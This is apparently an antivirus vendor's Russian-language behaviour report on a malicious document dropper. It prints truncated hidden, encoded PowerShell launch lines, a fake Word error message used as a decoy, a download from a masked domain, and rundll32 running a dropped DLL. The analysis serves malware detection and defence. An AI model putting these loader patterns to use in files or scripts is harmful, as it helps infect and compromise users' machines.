Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD JAAxADIAcABpAEYAUwAgAD0AWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9ACIALQBGACAAJwBTACcALAAnAHkAUwAnACwAJwB0AGUAbQAuAGkAbwAuAGQASQByAGUAJwAsACcAQwB0AG8A...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\mcmk_7n\lwsm3ix\z3czln3sh.dll
Сетевая активность
TCP
Запросы HTTP GET
- http://go####gloves.com.pk/vbxgiyhn.zip
UDP
- DNS ASK ma##.####petown-myafrica.com
- DNS ASK go####gloves.com.pk
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD JAAxADIAcABpAEYAUwAgAD0AWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMQB9AH...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Mcmk_7n\Lwsm3ix\Z3czln3sh.dll 0
